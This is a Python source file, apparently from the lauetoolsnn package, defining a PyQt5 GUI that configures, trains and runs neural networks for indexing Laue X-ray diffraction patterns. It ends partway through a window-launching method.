from PyQt5 import QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication, QMainWindow,\
QPushButton, QWidget, QFormLayout, \
QToolBar, QStatusBar, QSlider, \
QVBoxLayout, QTextEdit, QProgressBar, \
QComboBox, QLineEdit, QFileDialog, QMenuBar,QScrollArea
# from PyQt6 import QtCore#, QtGui
# from PyQt6.QtCore import QSettings
# from PyQt6 import QtGui, QtWidgets
# from PyQt6.QtWidgets import QApplication, QMainWindow,\
# QPushButton, QWidget, QFormLayout, \
# QToolBar, QStatusBar, QSlider, \
# QVBoxLayout, QTextEdit, QProgressBar, \
# QComboBox, QLineEdit, QFileDialog, QMenuBar,QScrollArea
## for faster binning of histogram
## C version of hist
# from fast_histogram import histogram1d
## Keras import
tensorflow_keras = True
try:
import tensorflow as tf
# import keras
from keras.models import model_from_json
from keras.callbacks import EarlyStopping, ModelCheckpoint
except:
tensorflow_keras = False
## util library with MP function
try:
from utils_lauenn import Symmetry,Lattice,\
simulatemultiplepatterns, worker_generation, chunker_list,call_global,\
read_hdf5, get_ipf_colour,predict_ubmatrix, predict,\
predict_preprocessMP, global_plots, texttstr, get_material_data,\
write_training_testing_dataMTEX, SGLattice, simulate_spots, mse_images, \
generate_classHKL, rmv_freq_class, array_generator, vali_array, array_generator_verify,\
model_arch_general, worker, LoggingCallback, predict_preprocessMP_vsingle,\
computeGnomonicImage, OrientationMatrix2Euler #save_sst
except:
from lauetoolsnn.utils_lauenn import Symmetry,Lattice,\
simulatemultiplepatterns, worker_generation, chunker_list,call_global,\
read_hdf5, get_ipf_colour,predict_ubmatrix, predict,\
predict_preprocessMP, global_plots, texttstr, get_material_data,\
write_training_testing_dataMTEX, SGLattice, simulate_spots, mse_images, \
generate_classHKL, rmv_freq_class, array_generator, vali_array, array_generator_verify,\
model_arch_general, worker, LoggingCallback, predict_preprocessMP_vsingle,\
computeGnomonicImage, OrientationMatrix2Euler #save_sst
try:
from lauetools import dict_LaueTools as dictLT
from lauetools import IOLaueTools as IOLT
from lauetools import generaltools as GT
from lauetools import LaueGeometry as Lgeo
from lauetools import readmccd as RMCCD
from lauetools import IOimagefile as IOimage
from lauetools import imageprocessing as ImProc
# from lauetools import CrystalParameters as CP
except:
import lauetoolsnn.lauetools.dict_LaueTools as dictLT
import lauetoolsnn.lauetools.IOLaueTools as IOLT
import lauetoolsnn.lauetools.generaltools as GT
import lauetoolsnn.lauetools.LaueGeometry as Lgeo
import lauetoolsnn.lauetools.readmccd as RMCCD
import lauetoolsnn.lauetools.IOimagefile as IOimage
import lauetoolsnn.lauetools.imageprocessing as ImProc
# import lauetoolsnn.lauetools.CrystalParameters as CP
## GPU Nvidia drivers needs to be installed! Ughh
## if wish to use only CPU set the value to -1 else set it to 0 for GPU
## CPU training is suggested (as the model requires more RAM)
try:
# Disable all GPUS
tf.config.set_visible_devices([], 'GPU')
visible_devices = tf.config.get_visible_devices()
for device in visible_devices:
assert device.device_type != 'GPU'
except:
# Invalid device or cannot modify virtual devices once initialized.
pass
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
def resource_path(relative_path, verbose=0):
""" Get absolute path to resource, works for dev and for PyInstaller """
base_path = os.path.dirname(__file__)
if verbose:
print("Base path of the library: ",base_path)
return os.path.join(base_path, relative_path)
Logo = resource_path("lauetoolsnn_logo.png", verbose=0)
default_initialization = True
if default_initialization:
material_global = "GaN" ## same key as used in LaueTools
symmetry_global = "hexagonal"
material1_global = "Si" ## same key as used in LaueTools
symmetry1_global = "cubic"
prefix_global = ""
detectorparameters_global = [79.583,976.202,931.883,0.4411,0.3921]
pixelsize_global = 0.0734 # 0.079142 #
ccd_label_global = "sCMOS" #"MARCCD165" #"Cor"#
dim1_global = 2018 #2048 #
dim2_global = 2016 #2048 #
emax_global = 23
emin_global = 5
UB_matrix_global = 5
image_grid_globalx = 21
image_grid_globaly = 51
intensity_threshold_global = 100 #75 800
boxsize_global = 15
fit_peaks_gaussian_global = 1
FitPixelDev_global = 15
strain_label_global = "NO" ## compute and plot strains
tolerance_strain = [0.35,0.25,0.15] ## reduced tolerance for strain calculations
tolerance_strain1 = [0.35,0.25,0.15]
hkls_list_global = "[1,1,0],[1,0,0],[1,1,1]"#,[3,1,0],[5,2,9],[7,5,7],[7,5,9]"
##exp directory
if material_global == material1_global:
fn1 = material_global + prefix_global
else:
fn1 = material_global + "_" + material1_global + prefix_global
expfile_global = None #r"C:\Users\purushot\Desktop\Tungsten_olivier_data\d0-300MPa"
exp_prefix_global = None #"Wmap_WB_13sep_d0_300MPa_" #"nw2_" #None #"roi3_" #
modelfile_global = resource_path("models", verbose=0) + "//" + fn1
if material_global == material1_global:
fn1 = material_global
if exp_prefix_global == None:
exp_prefix_global = material_global + "_"
weightfile_global = modelfile_global + "//" + "model_" + material_global + ".h5"
else:
fn1 = material_global + "_" + material1_global
if exp_prefix_global == None:
exp_prefix_global = material_global + "_"+material1_global + "_"
weightfile_global = modelfile_global + "//" + "model_" + material_global + "_" + material1_global + ".h5"
main_directory = resource_path("models", verbose=0)
hkl_max_global = "5"
elements_global = "all"
freq_rmv_global = 100
hkl_max1_global = "5"
elements1_global = "all"
freq_rmv1_global = 100
maximum_angle_to_search_global = 120
step_for_binning_global = 0.1
nb_grains_per_lp_global = 2
nb_grains_per_lp1_global = 2
grains_nb_simulate_global = 500
include_scm_global = False
batch_size_global = 50
epochs_global = 5
tolerance_global = 0.5
tolerance_global1 = 0.5
model_weight_file = None
softmax_threshold_global = 0.80 # softmax_threshold
mr_threshold_global = 0.95 # match rate threshold
cap_matchrate = 0.01 * 100 ## any UB matrix providing MR less than this will be ignored
coeff = 0.10 ## should be same as cap_matchrate or no?
coeff_overlap1212 = 0.15 ##15% spots overlap to avoid bad orientation detection
NumberMaxofFits = 5000 ### Max peaks per LP
mode_spotCycle = "graphmode" ## slow: to cycle through all spots else: cycles through smartly selected pair of spots
material0_limit1212 = 100000
material1_limit1212 = 100000
use_previous_UBmatrix = False
write_mtex_file = True
misorientation_angle1 = 1
cpu_count_user = -1
strain_free_parameters = ["rotx", "roty", "rotz", "alpha", "beta", "gamma", "b", "c"]
additional_expression = ["none"]
try:
if symmetry_global =="cubic":
material0_lauegroup = "11"
elif symmetry_global =="monoclinic":
material0_lauegroup = "2"
elif symmetry_global == "hexagonal":
material0_lauegroup = "9"
elif symmetry_global == "orthorhombic":
material0_lauegroup = "3"
elif symmetry_global == "tetragonal":
material0_lauegroup = "5"
elif symmetry_global == "trigonal":
material0_lauegroup = "7"
elif symmetry_global == "triclinic":
material0_lauegroup = "1"
except:
material0_lauegroup = "11"
try:
if symmetry1_global =="cubic":
material1_lauegroup = "11"
elif symmetry1_global =="monoclinic":
material1_lauegroup = "2"
elif symmetry1_global == "hexagonal":
material1_lauegroup = "9"
elif symmetry1_global == "orthorhombic":
material1_lauegroup = "3"
elif symmetry1_global == "tetragonal":
material1_lauegroup = "5"
elif symmetry1_global == "trigonal":
material1_lauegroup = "7"
elif symmetry1_global == "triclinic":
material1_lauegroup = "1"
except:
material1_lauegroup = "11"
if cpu_count_user == -1:
cpu_count_user = cpu_count()
GUI_START_TIME = time.time() #in ms
ACCEPTABLE_FORMATS = [".npz"]
gui_state = np.random.randint(1e6)
#%% Main module
class Window(QMainWindow):
"""Main Window."""
def __init__(self, winx=None, winy=None):
"""Initializer."""
super(Window, self).__init__()
# QMainWindow.__init__(self)
app_icon = QtGui.QIcon()
app_icon.addFile(Logo, QtCore.QSize(16,16))
self.setWindowIcon(app_icon)
if winx==None or winy==None:
self.setFixedSize(16777215,16777215)
else:
self.setFixedSize(winx, winy)
self.setWindowTitle("Laue Neural-Network v3")
self._createMenu()
self._createToolBar()
self._createStatusBar()
## init variables
self.input_params = {}
self.factor = 5 ## fixed for 20% validation dataset generation
self.state = 0
self.state1 = 0
self.state2 = 0
self.model = None
self.mode_spotCycleglobal = mode_spotCycle
self.softmax_threshold_global = softmax_threshold_global
self.mr_threshold_global = mr_threshold_global
self.cap_matchrate = cap_matchrate
self.coeff = coeff
self.coeff_overlap = coeff_overlap1212
self.fit_peaks_gaussian_global = fit_peaks_gaussian_global
self.FitPixelDev_global = FitPixelDev_global
self.NumberMaxofFits = NumberMaxofFits
self.tolerance_strain = tolerance_strain
self.tolerance_strain1 = tolerance_strain1
self.misorientation_angle = misorientation_angle1
self.material0_limit = material0_limit1212
self.material1_limit = material1_limit1212
self.material_phase_always_present = None
self.matrix_phase_always_present = None
self.generate_additional_data=False
self.use_previous_UBmatrix = use_previous_UBmatrix
self.crystal = None
self.SG = None
self.general_diff_rules = False
self.crystal1 = None
self.SG1 = None
self.general_diff_rules1 = False
self.strain_free_parameters = strain_free_parameters,
self.additional_expression = additional_expression
# Add box layout, add table to box layout and add box layout to widget
self.layout = QVBoxLayout()
self._centralWidget = QWidget(self)
self.setCentralWidget(self._centralWidget)
self._centralWidget.setLayout(self.layout)
self._createDisplay() ## display screen
self.setDisplayText("Lauetoolsnn v"+ str(version_package))
self.setDisplayText(frame_title)
self.setDisplayText("Uses base libraries of LaueTools (micha@esrf.fr) to simulate Laue patterns for a given detector geometry \nFollows convention of BM32 beamline at ESRF")
self.setDisplayText("Polefigure and IPF plot modules are taken and modified from PYMICRO repository; HKL multiplicity and conditions are taken from xrayutilities library")
self.setDisplayText("This version supports multiprocessing \nGUI initialized! \nLog will be printed here \nPlease Train a model first, if not already done.\n")
self.setDisplayText("New materials and extinction rules can be set in LaueTools DictLP file before launching this module")
self.setDisplayText("For now the Learning rate of optimizer, Kernel and Bias weight Initializers are already optimized and set in the in-built model (can also be set to different values in the config window)"+\
" (TO find another set of parameters please use Hyper parameter optimization routine in GUI)")
self.setDisplayText("Load a config file first (for example see the example_config tab)")
self._formLayout() ## buttons and layout
self.popups = []
# self.showMaximized()
self.setFixedSize(16777215,16777215)
config_setting = configparser.ConfigParser()
filepath = resource_path('settings.ini')
config_setting.read(filepath)
config_setting.set('CALLER', 'residues_threshold',str(0.5))
config_setting.set('CALLER', 'nb_spots_global_threshold',str(8))
config_setting.set('CALLER', 'option_global',"v2")
config_setting.set('CALLER', 'use_om_user',"false")
config_setting.set('CALLER', 'nb_spots_consider',str(500))
config_setting.set('CALLER', 'path_user_OM',"none")
config_setting.set('CALLER', 'intensity', str(200))
config_setting.set('CALLER', 'boxsize', str(15))
config_setting.set('CALLER', 'pixdev', str(15))
config_setting.set('CALLER', 'cap_softmax', str(0.85))
config_setting.set('CALLER', 'cap_mr', str(0.01))
config_setting.set('CALLER', 'strain_free_parameters', ",".join(strain_free_parameters))
config_setting.set('CALLER', 'additional_expression', ",".join(additional_expression))
with open(filepath, 'w') as configfile:
config_setting.write(configfile)
def closeEvent(self, event):
try:
self.text_file_log.close()
except:
print("Nothing to close")
self.close
QApplication.closeAllWindows()
super().closeEvent(event)
def _createDisplay(self):
"""Create the display."""
self.display = QTextEdit()
self.display.setReadOnly(True)
self.layout.addWidget(self.display)
def setDisplayText(self, text):
self.display.append('%s'%text)
self.display.moveCursor(QtGui.QTextCursor.End)
self.display.setFocus()
def _createMenu(self):
self.menu = self.menuBar().addMenu("&Menu")
self.menu.addAction('&Load Config', self.getfileConfig)
self.menu.addAction('&Exit', self.close)
def getfileConfig(self):
filenameConfig = QFileDialog.getOpenFileName(self, 'Select the config text file',
resource_path("examples"))
self.load_config_from_file(filenameConfig[0])
def load_config_from_file(self, configFile):
global material_global, symmetry_global, material1_global, symmetry1_global
global prefix_global, main_directory, emin_global, emax_global, ccd_label_global
global detectorparameters_global, pixelsize_global, dim1_global, dim2_global
global UB_matrix_global, image_grid_globalx , image_grid_globaly
global intensity_threshold_global, boxsize_global, fit_peaks_gaussian_global, FitPixelDev_global
global strain_label_global, tolerance_strain, tolerance_strain1, hkls_list_global
global expfile_global, exp_prefix_global, modelfile_global, weightfile_global
global hkl_max_global, elements_global, freq_rmv_global, hkl_max1_global
global elements1_global, freq_rmv1_global, maximum_angle_to_search_global
global step_for_binning_global, nb_grains_per_lp_global, nb_grains_per_lp1_global
global grains_nb_simulate_global, include_scm_global, batch_size_global, epochs_global
global tolerance_global, model_weight_file, material0_limit1212, material1_limit1212, tolerance_global1
global softmax_threshold_global, mr_threshold_global, cap_matchrate, coeff, cpu_count_user
global coeff_overlap1212, mode_spotCycle, NumberMaxofFits, use_previous_UBmatrix
global write_mtex_file, material0_lauegroup, material1_lauegroup, misorientation_angle1
config = configparser.ConfigParser()
try:
config.read_file(open(configFile))
except:
self.write_to_console("File not selected, nothing to open")
return
material_global = config.get('MATERIAL', 'material')
symmetry_global = config.get('MATERIAL', 'symmetry')
try:
self.SG = int(config.get('MATERIAL', 'space_group'))
except:
if symmetry_global =="cubic":
self.SG = 230
elif symmetry_global =="monoclinic":
self.SG = 10
elif symmetry_global == "hexagonal":
self.SG = 191
elif symmetry_global == "orthorhombic":
self.SG = 47
elif symmetry_global == "tetragonal":
self.SG = 123
elif symmetry_global == "trigonal":
self.SG = 162
elif symmetry_global == "triclinic":
self.SG = 2
self.write_to_console("Space group is not defined, by default taking the higher order for the specified symmetry")
try:
self.general_diff_rules = config.get('MATERIAL', 'general_diffraction_rules') == "true"
except:
self.general_diff_rules = False
self.write_to_console("general_diffraction_rules is not defined, by default False")
try:
cpu_count_user = int(config.get('CPU', 'n_cpu'))
if cpu_count_user <= 0 or cpu_count_user > cpu_count():
cpu_count_user = cpu_count()
except:
cpu_count_user = cpu_count()
try:
material1_global = config.get('MATERIAL', 'material1')
symmetry1_global = config.get('MATERIAL', 'symmetry1')
try:
self.SG1 = int(config.get('MATERIAL', 'space_group1'))
except:
if symmetry1_global =="cubic":
self.SG1 = 230
elif symmetry1_global =="monoclinic":
self.SG1 = 10
elif symmetry1_global == "hexagonal":
self.SG1 = 191
elif symmetry1_global == "orthorhombic":
self.SG1 = 47
elif symmetry1_global == "tetragonal":
self.SG1 = 123
elif symmetry1_global == "trigonal":
self.SG1 = 162
elif symmetry1_global == "triclinic":
self.SG1 = 2
self.write_to_console("Space group 1 is not defined, by default taking the higher order for the specified symmetry")
try:
self.general_diff_rules1 = config.get('MATERIAL', 'general_diffraction_rules1') == "true"
except:
self.general_diff_rules1 = False
self.write_to_console("general_diffraction_rules1 is not defined, by default False")
except:
material1_global = "none"
symmetry1_global = "none"
self.SG1 = "none"
self.general_diff_rules1 = False
self.write_to_console("Only one material is defined, by default taking the other one as 'none'")
if material1_global == "none" and symmetry1_global =="none":
material1_global = material_global
symmetry1_global = symmetry_global
prefix_global = str(config.get('GLOBAL_DIRECTORY', 'prefix'))
main_directory = str(config.get('GLOBAL_DIRECTORY', 'main_directory'))
if main_directory == "default":
main_directory = resource_path("models", verbose=0)
detectorfile = config.get('DETECTOR', 'detectorfile')
if detectorfile == "ZnCuOCl":
detectorfile = resource_path("examples//ZnCUOCl//calib.det", verbose=0)
elif detectorfile == "GaN":
detectorfile = resource_path("examples//GaN_Si//calib.det", verbose=0)
elif detectorfile == "user_input":
detectorfile2 = config.get('DETECTOR', 'params').split(",")
detectorparameters_global = detectorfile2[:5]
pixelsize_global = detectorfile2[5]
dim1_global = detectorfile2[6]
dim2_global = detectorfile2[7]
ccd_label_global = detectorfile2[8]
try:
emax_global = float(config.get('DETECTOR', 'emax'))
emin_global = float(config.get('DETECTOR', 'emin'))
except:
self.write_to_console("Detector energy range not defined, using default values of 5-23KeV")
if detectorfile != "user_input":
try:
_file = open(detectorfile, "r")
text = _file.readlines()
_file.close()
# first line contains parameters
parameters = [float(elem) for elem in str(text[0]).split(",")]
detectorparameters_global = parameters[:5]
pixelsize_global = parameters[5]
dim1_global = parameters[6]
dim2_global = parameters[7]
# others are comments
comments = text[1:]
ccd_label_global = ""
for line in comments:
if line.startswith("# CCDLabel"):
ccd_label_global = line.split(":")[1].strip()
if ccd_label_global == "":
self.write_to_console("CCD label cannot be read from the calibration file, setting it to latest detector sCMOS")
ccd_label_global = "sCMOS"
except IOError as error:
self.write_to_console("Error opening file\n" + str(error))
except UnicodeDecodeError as error:
self.write_to_console("Error opening file\n" + str(error))
except:
self.write_to_console("Error opening file\n")
try:
UB_matrix_global = int(config.get('PREDICTION', 'UB_matrix_to_detect'))
except:
self.write_to_console("UB matrix to identify not defined, can be set in the Prediction window")
try:
image_grid_globalx = int(config.get('EXPERIMENT', 'image_grid_x'))
image_grid_globaly = int(config.get('EXPERIMENT', 'image_grid_y'))
except:
self.write_to_console("Scan grid not defined, can be set in the Prediction window")
try:
softmax_threshold_global = float(config.get('PREDICTION', 'softmax_threshold_global'))
except:
self.write_to_console("Softmax threshold not defined, using default 80%")
self.softmax_threshold_global = softmax_threshold_global
try:
mr_threshold_global = float(config.get('PREDICTION', 'mr_threshold_global'))
except:
self.write_to_console("Matching rate threshold not defined, using default 95%")
self.mr_threshold_global = mr_threshold_global
try:
coeff = float(config.get('PREDICTION', 'coeff'))
except:
self.write_to_console("Coeff Overlap v0 not defined, using default 10%")
self.coeff=coeff
try:
coeff_overlap1212 = float(config.get('PREDICTION', 'coeff_overlap'))
except:
self.write_to_console("Coeff Overlap not defined, using default 10%")
self.coeff_overlap=coeff_overlap1212
try:
mode_spotCycle = str(config.get('PREDICTION', 'mode_spotCycle'))
except:
self.write_to_console("Analysis mode not defined, using default graphmode, can be set in Prediction window")
self.mode_spotCycleglobal = mode_spotCycle
try:
material0_limit1212 = int(config.get('PREDICTION', 'material0_limit'))
except:
self.write_to_console("Max Nb of UB per material 0 not defined, using default maximum")
self.material0_limit = material0_limit1212
try:
material1_limit1212 = int(config.get('PREDICTION', 'material1_limit'))
except:
self.write_to_console("Max Nb of UB per material 1 not defined, using default maximum")
self.material1_limit = material1_limit1212
intensity_threshold_global = float(config.get('PEAKSEARCH', 'intensity_threshold'))
boxsize_global = int(config.get('PEAKSEARCH', 'boxsize'))
try:
fit_peaks_gaussian_global = int(config.get('PEAKSEARCH', 'fit_peaks_gaussian'))
except:
self.write_to_console("Fitting of peaks not defined, using default Gaussian fitting")
self.fit_peaks_gaussian_global = fit_peaks_gaussian_global
try:
FitPixelDev_global = float(config.get('PEAKSEARCH', 'FitPixelDev'))
except:
self.write_to_console("Fitting PixelDev of peaks not defined, using default 15 pix")
self.FitPixelDev_global=FitPixelDev_global
try:
NumberMaxofFits = float(config.get('PEAKSEARCH', 'NumberMaxofFits'))
except:
self.write_to_console("Max fits per LP not defined, using default 3000")
self.NumberMaxofFits=NumberMaxofFits
try:
strain_label_global = config.get('STRAINCALCULATION', 'strain_compute') == "true"
if strain_label_global:
strain_label_global = "YES"
else:
strain_label_global = "NO"
except:
strain_label_global = "NO"
self.write_to_console("Strain computation not defined, default False")
try:
tolerance_strain_temp = config.get('STRAINCALCULATION', 'tolerance_strain_refinement').split(",")
tolerance_strain = [float(i) for i in tolerance_strain_temp]
except:
self.write_to_console("Strain tolerance material 0 not defined")
self.tolerance_strain = tolerance_strain
try:
tolerance_strain_temp1 = config.get('STRAINCALCULATION', 'tolerance_strain_refinement1').split(",")
tolerance_strain1 = [float(i) for i in tolerance_strain_temp1]
except:
self.write_to_console("Strain tolerance for material 1 not defined")
self.tolerance_strain1 = tolerance_strain1
try:
hkls_list_global = config.get('POSTPROCESS', 'hkls_subsets')
except:
self.write_to_console("HKL post processing not defined, currently not used")
expfile_global = config.get('EXPERIMENT', 'experiment_directory')
exp_prefix_global = config.get('EXPERIMENT', 'experiment_file_prefix')
if expfile_global == "ZnCuOCl":
expfile_global = resource_path("examples//ZnCUOCl", verbose=0)
elif expfile_global == "GaN":
expfile_global = resource_path("examples//GaN_Si", verbose=0)
if exp_prefix_global == "ZnCuOCl":
exp_prefix_global = "HS17O_1_C_"
elif exp_prefix_global == "GaN":
exp_prefix_global = "nw1_"
##exp directory
if material_global == material1_global:
fn = material_global + prefix_global
else:
fn = material_global + "_" + material1_global + prefix_global
try:
model_weight_file = config.get('PREDICTION', 'model_weight_file')
except:
model_weight_file = "none"
modelfile_global = main_directory + "//" + fn
if material_global == material1_global:
if model_weight_file == "none":
weightfile_global = modelfile_global + "//" + "model_" + material_global + ".h5"
else:
weightfile_global = model_weight_file
else:
if model_weight_file == "none":
weightfile_global = modelfile_global + "//" + "model_" + material_global + "_" + material1_global + ".h5"
else:
weightfile_global = model_weight_file
try:
freq_rmv_global = int(config.get('TRAINING', 'classes_with_frequency_to_remove'))
except:
self.write_to_console("Frequency removal for HKLs not defined, can be defined in the config window")
try:
elements_global = config.get('TRAINING', 'desired_classes_output')
except:
self.write_to_console("Elements for HKLs not defined, can be defined in the config window")
try:
hkl_max_global = config.get('TRAINING', 'max_HKL_index')
except:
self.write_to_console("Max HKLs not defined, can be defined in the config window")
try:
nb_grains_per_lp_global = int(config.get('TRAINING', 'max_nb_grains'))
except:
self.write_to_console("Nb. of grains per LP not defined, can be defined in the config window")
try:
freq_rmv1_global = int(config.get('TRAINING', 'classes_with_frequency_to_remove1'))
except:
self.write_to_console("Frequency removal for HKLs 1 not defined, can be defined in the config window")
try:
elements1_global = config.get('TRAINING', 'desired_classes_output1')
except:
self.write_to_console("Elements for HKLs 1 not defined, can be defined in the config window")
try:
hkl_max1_global = config.get('TRAINING', 'max_HKL_index1')
except:
self.write_to_console("Max HKLs 1 not defined, can be defined in the config window")
try:
nb_grains_per_lp1_global = int(config.get('TRAINING', 'max_nb_grains1'))
except:
self.write_to_console("Nb. of grains per LP 1 not defined, can be defined in the config window")
try:
maximum_angle_to_search_global = float(config.get('TRAINING', 'angular_distance'))
except:
self.write_to_console("Histogram angle not defined, can be defined in the config window")
try:
step_for_binning_global = float(config.get('TRAINING', 'step_size'))
except:
self.write_to_console("steps for histogram binnning not defined, can be defined in the config window")
try:
grains_nb_simulate_global = int(config.get('TRAINING', 'max_simulations'))
except:
self.write_to_console("Number of simulations per LP not defined, can be defined in the config window")
try:
include_scm_global = config.get('TRAINING', 'include_small_misorientation') == "true"
except:
self.write_to_console("Single crystal misorientation not defined, can be defined in the config window")
try:
misorientation_angle = float(config.get('TRAINING', 'misorientation_angle'))
except:
misorientation_angle = misorientation_angle1
self.write_to_console("Angle of Single crystal misorientation along Z not defined, can be defined in the config window")
self.misorientation_angle = misorientation_angle
try:
batch_size_global = int(config.get('TRAINING', 'batch_size'))
except:
self.write_to_console("Batch size not defined, can be defined in the config window")
try:
epochs_global = int(config.get('TRAINING', 'epochs'))
except:
self.write_to_console("Epochs not defined, can be defined in the config window")
try:
cap_matchrate = float(config.get('PREDICTION', 'cap_matchrate')) * 100
except:
self.write_to_console("Cap_Matching rate not defined, setting default value of 1%")
self.cap_matchrate=cap_matchrate
try:
tolerance_global = float(config.get('PREDICTION', 'matrix_tolerance'))
except:
self.write_to_console("Angle tolerance to detect grains not defined, using default 0.7")
try:
tolerance_global1 = float(config.get('PREDICTION', 'matrix_tolerance1'))
except:
self.write_to_console("Angle tolerance for Mat 1 to detect grains not defined, using default 0.7")
try:
use_previous_UBmatrix = config.get('PREDICTION', 'use_previous') == "true"
except:
self.write_to_console("Use previous solutions not defined, using default value False")
self.use_previous_UBmatrix = use_previous_UBmatrix
try:
material_phase_always_present = config.get('DEVELOPMENT', 'material_phase_always_present')
except:
material_phase_always_present = "none"
self.write_to_console("material_phase_always_present not defined, default is NONE")
if material_phase_always_present == "none":
material_phase_always_present = None
else:
material_phase_always_present = int(material_phase_always_present)
self.material_phase_always_present = material_phase_always_present
try:
matrix_phase_always_present = config.get('DEVELOPMENT', 'matrix_phase_always_present')
except:
matrix_phase_always_present = "none"
self.write_to_console("matrix_phase_always_present not defined, default is NONE")
if matrix_phase_always_present == "none":
matrix_phase_always_present = None
else:
matrix_phase_always_present = matrix_phase_always_present
self.matrix_phase_always_present = matrix_phase_always_present
try:
generate_additional_data = config.get('DEVELOPMENT', 'generate_additional_data')=='true'
except:
generate_additional_data = False
self.write_to_console("generate_additional_data not defined, default is False")
self.generate_additional_data = generate_additional_data
try:
write_mtex_file = config.get('DEVELOPMENT', 'write_MTEX_file') == "true"
except:
self.write_to_console("Write MTEX texture file not defined, by default True")
try:
if symmetry_global =="cubic":
material0_lauegroup = "11"
elif symmetry_global =="monoclinic":
material0_lauegroup = "2"
elif symmetry_global == "hexagonal":
material0_lauegroup = "9"
elif symmetry_global == "orthorhombic":
material0_lauegroup = "3"
elif symmetry_global == "tetragonal":
material0_lauegroup = "5"
elif symmetry_global == "trigonal":
material0_lauegroup = "7"
elif symmetry_global == "triclinic":
material0_lauegroup = "1"
except:
material0_lauegroup = "11"
try:
if symmetry1_global =="cubic":
material1_lauegroup = "11"
elif symmetry1_global =="monoclinic":
material1_lauegroup = "2"
elif symmetry1_global == "hexagonal":
material1_lauegroup = "9"
elif symmetry1_global == "orthorhombic":
material1_lauegroup = "3"
elif symmetry1_global == "tetragonal":
material1_lauegroup = "5"
elif symmetry1_global == "trigonal":
material1_lauegroup = "7"
elif symmetry1_global == "triclinic":
material1_lauegroup = "1"
except:
material1_lauegroup = "11"
##update config file for Neural network
try:
residues_threshold = config.get('CALLER', 'residues_threshold')
except:
self.write_to_console("residues_threshold not defined, by default 0.25")
residues_threshold = 0.25
try:
nb_spots_global_threshold = config.get('CALLER', 'nb_spots_global_threshold')
except:
self.write_to_console("nb_spots_global_threshold not defined, by default 8")
nb_spots_global_threshold = 8
try:
option_global = config.get('CALLER', 'option_global')
except:
self.write_to_console("option_global not defined, by default v2")
option_global = "v2"
try:
use_om_user_global = config.get('CALLER', 'use_om_user')
except:
self.write_to_console("use_om_user not defined, by default False")
use_om_user_global = "false"
try:
nb_spots_consider_global = int(config.get('CALLER', 'nb_spots_consider'))
except:
self.write_to_console("nb_spots_consider not defined, by default 500")
nb_spots_consider_global = 500
try:
path_user_OM_global = config.get('CALLER', 'path_user_OM')
except:
self.write_to_console("path_user_OM not defined, by default None")
path_user_OM_global = ""
try:
strain_free_parameters = config.get('STRAINCALCULATION', 'free_parameters').split(",")
except:
strain_free_parameters = ["rotx", "roty", "rotz", "alpha", "beta", "gamma", "b", "c"]
self.write_to_console("strain_free_parameters not defined; fixing only 'a' length by default")
self.strain_free_parameters = strain_free_parameters
try:
additional_expression = config.get('STRAINCALCULATION', 'additional_expression').split(",")
except:
additional_expression = ["none"]
self.write_to_console("additional_expression not defined; none by default")
self.additional_expression = additional_expression
config_setting = configparser.ConfigParser()
filepath = resource_path('settings.ini')
self.write_to_console("Settings path is "+filepath)
config_setting.read(filepath)
config_setting.set('CALLER', 'residues_threshold',str(residues_threshold))
config_setting.set('CALLER', 'nb_spots_global_threshold',str(nb_spots_global_threshold))
config_setting.set('CALLER', 'option_global',str(option_global))
config_setting.set('CALLER', 'use_om_user',str(use_om_user_global))
config_setting.set('CALLER', 'nb_spots_consider',str(nb_spots_consider_global))
config_setting.set('CALLER', 'path_user_OM',str(path_user_OM_global))
config_setting.set('CALLER', 'intensity', str(intensity_threshold_global))
config_setting.set('CALLER', 'boxsize', str(boxsize_global))
config_setting.set('CALLER', 'pixdev', str(FitPixelDev_global))
config_setting.set('CALLER', 'cap_softmax', str(softmax_threshold_global))
config_setting.set('CALLER', 'cap_mr', str(cap_matchrate/100.))
config_setting.set('CALLER', 'strain_free_parameters', ",".join(strain_free_parameters))
config_setting.set('CALLER', 'additional_expression', ",".join(additional_expression))
with open(filepath, 'w') as configfile:
config_setting.write(configfile)
self.write_to_console("Config file loaded successfully.")
# except:
# self.write_to_console("Config file Error.")
def _createToolBar(self):
self.tools = QToolBar()
self.addToolBar(self.tools)
self.trialtoolbar101 = self.tools.addAction('Example_config', self.show_window_config)
self.trialtoolbar10 = self.tools.addAction('Re-Train saved model', self.show_window_retraining_fromfile)
self.trialtoolbar1 = self.tools.addAction('Re-Train GUI model', self.show_window_retraining)
self.trialtoolbar10.setEnabled(False)
self.trialtoolbar1.setEnabled(False)
def show_window_parameters(self):
w2 = AnotherWindowParams(self.state, gui_state)
w2.got_signal.connect(self.postprocesstrain)
w2.show()
self.popups.append(w2)
self.state = self.state +1
def show_window_retraining(self):
ct = time.time()
now = datetime.datetime.fromtimestamp(ct)
c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
self.train_model(prefix="_"+c_time, tag = 1)
def show_window_retraining_fromfile(self):
ct = time.time()
now = datetime.datetime.fromtimestamp(ct)
c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
self.train_model(prefix="_"+c_time, tag = 2)
def show_window_config(self):
w21 = sample_config()
w21.show()
self.popups.append(w21)
def show_window_liveprediction(self):
try:
if self.material_ != self.material1_:
with open(self.save_directory+"//classhkl_data_nonpickled_"+self.material_+".pickle", "rb") as input_file:
hkl_all_class0 = cPickle.load(input_file)[0]
with open(self.save_directory+"//classhkl_data_nonpickled_"+self.material1_+".pickle", "rb") as input_file:
hkl_all_class1 = cPickle.load(input_file)[0]
else:
hkl_all_class1 = None
with open(self.save_directory+"//classhkl_data_nonpickled_"+self.material_+".pickle", "rb") as input_file:
hkl_all_class0 = cPickle.load(input_file)[0]
except:
if self.material_ != self.material1_:
with open(self.save_directory+"//classhkl_data_"+self.material_+".pickle", "rb") as input_file:
_, _, _, _, _, hkl_all_class0, _, _, symmetry = cPickle.load(input_file)
with open(self.save_directory+"//classhkl_data_"+self.material1_+".pickle", "rb") as input_file:
_, _, _, _, _, hkl_all_class1, _, _, _ = cPickle.load(input_file)
else:
hkl_all_class1 = None
with open(self.save_directory+"//classhkl_data_"+self.material_+".pickle", "rb") as input_file:
_, _, _, _, _, hkl_all_class0, _, _, _ = cPickle.load(input_file)
w2 = AnotherWindowLivePrediction(self.state2, gui_state,
material_=self.material_, material1_=self.material1_, emin=self.emin,
emax=self.emax, symmetry=self.symmetry, symmetry1=self.symmetry1,
detectorparameters=self.detectorparameters, pixelsize=self.pixelsize,
lattice_=self.lattice_material, lattice1_ =self.lattice_material1,
